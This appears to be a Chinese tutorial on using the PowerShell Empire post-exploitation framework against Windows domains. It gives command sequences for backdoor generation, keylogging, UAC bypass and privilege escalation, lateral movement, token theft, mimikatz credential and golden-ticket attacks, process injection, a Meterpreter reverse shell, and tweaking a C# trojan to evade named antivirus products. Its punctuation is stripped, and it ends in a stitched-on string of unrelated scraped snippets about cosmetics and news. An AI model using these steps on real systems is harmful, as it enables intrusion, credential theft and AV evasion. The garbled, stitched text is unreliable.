PowerShellEmpire的后渗透利用
Empire后渗透框架主要用于Windows内网渗透,该框架主要基于Powershell和Python,它提供了一个模块的架构,帮助攻击者可以创建和执行各种攻击策略,支持包括域内渗透、宏钓鱼、内网横向、权限维持、后门生成等多个模块。
官网:http:www。powershellempire。com0x01下载安装
安装Empire由两种方式,分别是基于源码安装和apt包安装源码安装
在Github中下载Empiregitclonehttps:github。comEmpireProjectEmpire
直接安装Empire会报错。setupinstall。sh
需要安装以下Python库,当然在安装库时会遇到很多问题,以下是遇到问题后的解决方法pipinstallpyOpenSSLpipinstalliptoolspipinstallnetifacespipinstallpydispatchpipinstallpydispatcherpipinstallzlibwrapperpipinstallmacholibpipinstallxlrdpipinstallxlutilspipinstallpyminifierpipinstalldropboxpipinstallpefile
importlib无法安装解决方法aptgetinstallbuildessentialpython3devpython2devlibssldevswig
M2Crypto无法安装解决方法pipinstallDesktopM2Crypto0。38。0。tar。gz
dispatch无法安装解决方法pipinstallupgradesetuptools
CryPto。Cipher报错解决方法pipuninstallcryptopipinstallpycrypto
下载地址:https:pypi。orgprojectM2Cryptofiles
安装完成后成功启动Empire
APT包安装
使用apt包安装Empireaptinstallpowershellempirepowershellempire
0x02基础使用设置监听器
进入Empire输入help可查看帮助文档
输入listeners进入监听器设置,按tab自动补全(如果不清楚均可使用该方法)
设置http监听器uselistenerhttpinfo查看监听器信息
在监听器模块中带有True属性的值必须填写,其他属性可能会存在默认值,使用set和unset可改变设置,首先设置监听器名为testsetNametest
设置监听默认是80端口,但是80端口通常是Web服务器,修改端口为8080setHosthttp:172。16。54。51:8080setPort8080
开启监听器execute
删除监听器backlistkilltest
生成后门
使用usestager选择后门模块usestagerwindowslauncherbat
设置监听器和输出目录setListenertestsetOutFiletmplanuncher。bat默认输出tmp目录execute
在tmp目录成功找到生成后门
把输出的后门放入目标系统中执行,执行成功后收到响应活动代理
使用agents查看当前会话,通过interact进入会话agentsinteract22FLR8SU
如果觉得会话名称太过复杂,可重命名会话renamewin7
agents下可使用命令如下:
命令执行
查看系统信息sysinfo
查询agents命令helpagentscmds
执行终端命令shellwhoami
基本功能
使用截图功能sc
使用键盘记录usemodulecollectionkeyloggerexecute
使用剪切版usemodulecollectionclipboardmonitorexecute
0x03常见模块主机扫描
ARP扫描模块sleep0设置间隔时间usemodulesituationalawarenessnetworkarpscansetRange192。168。0。1192。168。0。100execute
SMB扫描模块usemodulesituationalawarenessnetworksmbscannersetUserNameadministratorsetPasswordmacexecute
端口扫描模块usemodulesituationalawarenessnetworkportscansetHosts192。168。0。1100setPorts445execute
信息收集
查找本地管理员主机usemodulesituationalawarenessnetworkpowerviewfindlocaladminaccessexecute
查看共享文件usemodulesituationalawarenessnetworkpowerviewsharefinderexecute
Windows本地信息收集usemodulesituationalawarenesshostwinenumexecute
权限提升
当前权限并非管理员,需要提权操作
使用UACbypass模块提权usemoduleprivescbypassuacsetListenertestexecute
使用powerup检查可提权项,找到后可利用环境向量提权usemoduleprivescpowerupallcheckssetListenertestexecute
使用计划任务进行提权usemodulepersistenceelevatedschtaskssetListenertestexecute
通过溢出漏洞提权,比如烂土豆漏洞
usemoduleprivescms16032或usemoduleprivescms16135setListenertestexecute
成功提权至SYSTEMagents
0x04域内渗透环境介绍DC:192。168。52。138T1:192。168。52。128192。168。0。100D1:192。168。52。141
当前已取得域内普通用户mac和本地管理员权限agents
信息收集
基础信息收集,包括系统信息、用户信息、网络环境等sysinfowhoamiinfo
使用ARP扫描,成功找到192。168。52。024存在四台主机usemodulesituationalawarenessnetworkarpscansetRange192。168。52。024execute
查找本地管理员usemodulesituationawarenessnetworkpowerviewfindlocaladminaccessexecute
查看当前用户是否为其他主机上的本地管理员shelldir192。168。52。141C
成功找到域控主机IP为192。168。52。138usemodulesituationawarenessnetworkpowerviewgetdomaincontrollerexecute
横向移动
使用会话注入需要管理员权限,切换本地管理员后把当前会话注入到其他主机上usemodulelateralmovementinvokepsexecsetListenertestsetComputerNamestu1execute
使用invokewmi模块相比invokepsexec更加隐蔽usemodulelateralmovementinvokewmisetListenertestsetComputerNamestu1execute
窃取token
在新会话中查看进程发现域管理员进程ps
选择目标PID号后窃取域管理员tokenstealtoken1740shelldirOWAC
如果需要恢复原来的身份可使用以下命令revtoself
凭证获取
利用mimikatz拿到管理员密码明文和哈希mimikatz
查看所有用户凭证如下:creds
利用哈希传递可拿到域控访问权限黄金票据
在域控下使用lsadump模块获取域内所有用户哈希usemodulecredentialsmimikatzlsadumpcreds
成功拿到krbtgt用户哈希
利用goldenticket制作黄金票据usemodulecredentialsmimikatzgoldenticketsetcredid10setuseradministratorexecute
0x05会话管理会话生成
使用spawn模块生成新会话usemodulemanagementspawnsetListenertestexecute
进程注入
查看进程并选择需注入的进程IDps
成功注入winlogon进程psinjecttest1120
注入这类系统进程不会出现蓝屏MSF会话联动
首先在MSF中设置http监听useexploitmultihandlersetpayloadwindowsmeterpreterreversehttpsetlhost192。168。0。50setlport4444exploitj
在Empire中设置反弹,其中payload需要与上对应usemodulecodeexecutioninvokeshellcodesetLhost192。168。0。50setLport4444setPayloadreversehttpexecute
经测试未受到反弹shell,查阅资料后发现Empire转到MSF存在局限性,具体可查看https:www。jianshu。compc5153ee1eb760x06EmpireWeb下载安装
Empire存在web版本,把PHP和Empire结合的方式通过网页进行访问
下载地址:https:github。cominterferencesecurityempireweb
下载empirewebgitclonehttps:github。cominterferencesecurityempireweb
安装PHP扩展,需根据本机的PHP版本进行修改aptgetinstallphp7。4curl
重启Apache后启用扩展etcinit。dapache2restart基础使用
设置绑定端口和登录账号密码。empirerestrestport1337usernameadminpassword3mpir3admin
访问站点输入账号密码admin3mpir3admin
成功登录能够可视化各个模块
查看Agents模块
查看已获取的用户凭证
查看文件系统
0x07免杀模块生成csharp木马
准备VisualStido用于编译C文件
下载地址:http:download。microsoft。comdownloadB0FB0F589EDF1B7478C849A02C8395D0995VS2012ULTchs。iso
生成C类型木马usestagerwindowscsharpexesetListenertestinfoexecute
成功生成后门文件launcher。src
csharp编译免杀
使用VisualStdio打开cmd。sln
需要安装。net2。0环境,打开程序与功能中的添加或删除程序安装net3。5版本,如果无法安装,打开组策略》系统〉指定可选组件安装和组件修复的设置
。net支持:https:dotnet。microsoft。comenusdownloadvisualstudiosdks
修改命名空间为mac123并添加花指令vara12345678;varb67890123;
完成后编译生成程序文件
免杀效果
使用火绒成功免杀
使用360成功免杀
但是执行后360会对行为查杀,上线则不受影响
成功进入新会话当中interactXWVH8ME2
迪奥蓝星唇釉上市时间dior迪奥蓝星唇釉怎么用迪奥蓝星唇釉是迪奥家蓝星系列的新品,属于一款哑光唇釉,看到博主的试色简直就是分分钟种草,不卡纹还持久显色,唯一的缺点就是有一点香味,那么,迪奥蓝星唇釉怎么样怎么用?迪奥蓝星唇釉……
防晒喷雾里面有酒精吗?防晒喷雾都有酒精吗?防晒喷雾是夏日防晒必备的方便防晒物品,很多人整个夏季会用掉好几瓶防晒喷雾,据说防晒喷雾里面也含有酒精,下面介绍防晒喷雾里面有酒精吗?防晒喷雾都有酒精吗?防晒喷雾里面有酒精吗……
浅色系染发剂哪个牌子好浅色系染发剂网红款介绍深色系染发和浅色系染发用的染发剂是不同的,有很多的染发剂对深色头发没有用,也有很多染发剂对浅色头发不起作用,这就表示我们在挑选染发剂时要慎重,下面5号网小编带大家来看一下浅色系……
植村秀白瓷气垫好用吗植村秀白瓷气垫评测植村秀白瓷气垫是网状的设计,沾取用量更方便控制,触感也更加的柔软。那么植村秀白瓷气垫怎么样?植村秀白瓷气垫好用吗?植村秀白瓷气垫介绍植村秀白瓷气垫粉底以突破传统气垫的遮瑕……
怎么化妆才能变漂亮粉嫩女神妆容教程小编口袋里收藏了几个特别喜欢的youtuber,其中一位就是吴斐莉Natalie。不只人长得美,声音温柔,分享化妆心得时还非常有耐心!言归正传,这次她利用JillStuart粉……
玫瑰色眼妆的画法教程夏日约会外出不想只化上大地色眼妆?不如尝试一下简单易学的玫瑰色眼妆啦色彩亮丽之余,又不会太浮夸,男友看到也会被瞬间迷倒先涂上防晒乳隔离霜打底,然后挑选适合夏天使用的持久防……
拥有120Hz高刷OLED屏和光学防抖镜头,moto这款手机联想手机产品线近期新机不少,除了打着拯救者新机身份登场的Y70电竞手机,旗下moto品牌更是三机齐上线,包括1999元起的S30Pro、3499元起X30Pro以及顶配折叠屏旗……
迪奥2018年春季新粉底凝脂系列好用吗?价格及上市时间迪奥是我们平时的日常生活中非常常见的彩妆品牌,很多人都非常喜欢迪奥家的化妆品,我们都知道现在市面上的彩妆品牌每年都会按季节推出不同的彩妆产品,那么迪奥2018年春季新粉底凝脂系……
修容棒可以直接用吗?用刷子还是用手是一个问题修容棒的使用方法很简单,先是在脸上画出修容的痕迹,然后用东西晕开,这样边界就会比较自然,也不容易让人看出来是修容了,那么,修容棒可以直接用吗?修容棒可以直接用吗在没有任何……
过去十年各支球队的胜率排名来自StatMuse的数据!过去十年各支球队的胜率排名!具体的如下图!排在前五的分别是:1、勇士,66。52、快船,62。63、马刺,62。……
如何一招把人击倒在拳击、综合格斗(MMA)和自卫时,需要尽快把对方击倒。这是结束战斗最快的方法。一般来说,当你往一边猛击对方的头时,会导致大脑撞到头骨一侧,让他们眼前一黑,从而把他们击倒。〔1……
雅诗兰黛恋爱310适合日常吗雅诗兰黛恋爱310素颜吗恋爱唇膏310火星红,华晨宇的代言色,迷妹不要错过啦!下面5号网小编带大家来看一下雅诗兰黛恋爱310适合日常吗?雅诗兰黛恋爱310素颜吗?雅诗兰黛恋爱310适合日常吗像这……
用完粉底液还需要用散粉吗涂了粉底液可以涂散粉吗散粉有很好的定妆效果,是很多人都非常喜欢的一种定妆产品,粉底液可以很好的修饰脸部肌肤,一般情况下,很多人在上完粉底液之后都会使用散粉来定妆,那么用完粉底液还需要用散粉吗?涂了粉……
阿玛尼红管200多少钱阿玛尼红管200价格阿玛尼是国际知名彩妆品牌,阿玛尼唇釉一直是他们家卖的很好的彩妆产品,阿玛尼红管唇釉是哑光的,有很多热门的色号,下面就一起来看看阿玛尼红管200多少钱?阿玛尼红管200价格。阿玛……
tomford2018秋冬雾面口红色号大全秋冬大势色是这些大家应该都发现了,今年秋冬彩妆重点,唇彩大势回归,各品牌纷纷推出万年不败哑光唇彩,这季TOMFORD也推出最新雾面唇膏,主打乳霜般润感营造出喀什米尔唇,要你打破雾面唇膏不保湿、……
浅谈保险公司在线培训发展趋势随着互联网技术的不断发展,越来越多的金融保险公司开始采用在线培训的方式来提高员工的技能水平,提高服务质量,混合式培训方式不仅节省时间和成本,还能够为员工提供更灵活的学习方式,满……
GPT4概念揭晓人工智能迎来新里程碑,将更接近于人脑!所见所得,都很科学近日,GPT4的概念引发了广泛的热议,许多科技公司纷纷涨停。据悉,GPT4将进入微软必应搜索,并在几周内完成。那么,GPT4到底是什么?它将带来怎样的革……
春暖花开,植得期待植树节3月12日2023年3月12日是我国第45个植树节,伴几缕春风,种下几株树苗,让孩子亲身体验植树的乐趣,为春天的自然添增一抹绿意,让世……
防晒霜对皮肤有伤害吗?每天用防晒霜伤皮肤吗?防晒霜是夏季防晒的必备产品,有的人说防晒霜其实会伤害皮肤,很多人都不太相信这个说法,那么到底事实是怎么样呢,下面介绍防晒霜对皮肤有伤害吗?每天用防晒霜伤皮肤吗?防晒霜对皮肤有伤……
蜜粉可以当粉底吗?蜜粉和粉底都是属于面部产品,传统意义认为蜜粉可以起到定妆的作用,那么可以做为底妆产品使用吗?一起了解蜜粉可以当粉底吗蜜粉不建议当粉底化妆擦蜜粉会更好看皮肤如果干的话……
今日文摘你曾经被哪些句子救赎过?1。我们似乎总会在某一年,爆发性地长大,爆发性地觉悟,爆发性地知道某个真相,让原本没有什么意义的时间的刻度,成了一道分界线。2。请接受你现在的样子,同时也完善你现在的样子……
梦想和饼一样,先咬一口才能饱1hr元旦刚过,大家都在和2022告别。对于很多人来说,过去的一年太苦了,苦到喝咖啡都能感受到一丝甜意。看着大家在31号,站在西湖喊着倒计时。那一刻,与其说他……
香奈儿指甲油试色香奈儿指甲油颜色推荐chanel香奈儿的指甲油真的是hin好看呢,涂在指甲上仿佛指甲都会跳舞了呢。今天5号网小编就要为大家介绍一下,香奈儿指甲油试色怎么样?香奈儿指甲油颜色推荐有哪些?香奈儿指甲油……
罗罗公司的创新精神号时速达到387英里成为世界上最快的电动飞据NewAtlas报道,由罗尔斯罗伊斯(以下简称罗罗,RR)开发的一架飞机打破了全电动飞机的速度记录,该公司在宣布其目标后的三年内就实现了这一点。该公司的创新精神(Spirit……